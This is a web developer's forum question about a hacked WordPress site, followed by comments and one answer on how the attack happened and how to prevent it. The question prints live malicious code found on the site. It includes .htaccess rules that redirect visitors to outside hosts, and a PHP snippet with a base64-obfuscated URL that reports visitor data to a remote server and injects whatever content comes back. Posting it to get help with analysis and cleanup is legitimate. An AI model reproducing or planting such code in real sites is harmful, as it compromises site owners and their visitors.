# Prevent Malware attack on my site

Tags: php, wordpress, security, malware

I built a wordpress site for a client. After some days, client reported that the site has been blocked by Google for Malware content. When I reviewed the site, I found some changes in the code like .htaccess had this code other than the previous one.

```
 RewriteEngine On

 RewriteBase /

 RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)

 RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]

 RewriteRule ^.*$ http://clubatleticoestrada.org.ar/awas.html?h=1110720 [L,R]

</IfModule>



<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
RewriteRule ^.*$ http://halisahamiz.com/eehs.html?h=1110720 [L,R]
</IfModule>


<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
RewriteRule ^.*$ http://zabetonom.ru/mhos.html [L,R]
</IfModule>


RewriteEngine On

RewriteBase / 



# MCCL



# END MCCL
```

and the index.php contanied this :

```
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
     curl_close($stCurlHandle); 
}
}
```

How does this attack happen and how can I prevent myself in future of this attack ?

While resetting the site, I found some files outside public Html folder that were affected. Now how anyone manages that ?

Comment: I think this [forum](http://security.stackexchange.com/) would be more appropriate :)

Comment: There are so many ways this could happen. PM me the URL and I'll see if I can find any obvious security issues and point you in the right direction. Or not if you don't feel comfortable with it. The comment above me is right also.

Comment: @AdrienLacroix Ok..I will definitely try the other forum. Thanks.

Comment: @Codeeater - at the very least - are you running with the latest version of WordPress? How about all the plugins installed?

Comment: @JosiahSouth : I already cleaned up the hosting and uploaded the back up files. The hosting server had multiple sites(domains) and all of them were affected.

Comment: @andrewsi : Yes,  I used the latest version of wordpress. But as I said the server hosted multiple sites and I can't be sure about other sites.

Comment: @Codeeater Exactly. Now your site is right back where it was when it was compromised. The vulnerabilities are still there. That is, if it was actually your site that was compromised. It may have been another site on the same server.

Comment: @Codeeater - if everyone got affected, then the host got hacked. You should find a better host, in that case - they clearly don't have much idea about security.

Comment: @Josiah South : I haven't restored all the sites but only three. And I am reviewing other sites before uploading them. That's why I wanted to know the modus operandi of the attack.

Comment: No one can tell you how they did it. Post the URL if you would like me to look and even send you a scan with Acunetix (very pricey.... otherwise I'd just suggest you buy it for yourself). Even then if vulnerabilities are found we won't know for sure what method was used.

Comment: @AdrienLacroix : I posted my question on the forum as suggested by you. I haven't got any response yet but already got a negative rating. Still wondering why?

Comment: @JosiahSouth : I can definitely provide you the URL(http://funnylink.info/) but there is nothing other than some some tracking software installed there right now of which I cannot provide you with username and passwords ofcourse. I am not sure whether they will be of some help to you.

Comment: Retracted. Anyway, your attacker didn't need a username/password, why should I? That's the entire point. Basically when I'm not busy in a minute I'm going to see if I can find a feasible way to do the exact same thing the attacker did to you. Although I won't actually compromise your site if I do find a vulnerability and I will tell you what I found.

Comment: @JosiahSouth :Ok..In that case, let me upload all the sites first so that you will have something to work on.

Comment: @Codeeater I don't really have a full day or anything to do this haha. But I'll give it a quick look at least. My laptop with Acunetix isn't at the office right now, though. Once I'm home I'll run a scan and send you the results and you'll have ample data to work with. It's still possible that someone else's site was the problem, though.

Comment: @JosiahSouth : Even your quick look will be highly appreciated. :)

Comment: @JosiahSouth I highly recommend against this. You don't have a signed contract or work request, you dont know what jurisdiction the site is in, you don't even know for sure if the OP is the actual owner of the site. You could accidentally get into a lot of trouble for this.

Comment: @AviD Looking for vulnerabilities isn't a crime. Exploiting them would  be.

Comment: Depending on jurisdiction and definition of "looking", any misuse of the site could be a crime.

Answer (score 2):

An entire big library would not be enough to explain how an "hacker attack" can be executed. There are many methods and tools to attack a website. Beside [SQL injection](http://en.wikipedia.org/wiki/SQL_injection),  [cross scripts](https://en.wikipedia.org/wiki/Cross-site_scripting) and password stealing that are very common, there are sophisticated tools used by professionals. 
If I understand whats happened, they have redirected your web site.
I can only recommend to make sure you have the most recent software update on your server, check your site with a "check tool" like [this](http://www.websecurify.com) or like [Acunetix](http://www.acunetix.com). Hackers do the same to find vulnerable web sites.
If you think that reloading the backup would solve the problem, you may experience a surprise. Hackers use to download a backdoor and they get back to your site. So changing password may not work. I would recommend you to be very careful in cleaning it up. Also ask your provider if they have had any of the other sites hacked on the same server. In such case you can be sure there is a back door ([shell](http://www.securitytube.net/video/976)) on the server. In this case is not your problem but is the provider responsibility to sort out the vulnerabilities and clean up the server. This is the most common situation.
All of the above is just to give a rough idea about the complexity of the matter and I fully agree with Adrien that this topic is for an internet security forum.

Comment: But how can every site being hosted on the same server be attacked simultaneously ? Is that a security loophole in the programming side or the hosting company?

Comment: You hack one site end then if the server is vulnerable you can root it out and take control of the entire server content.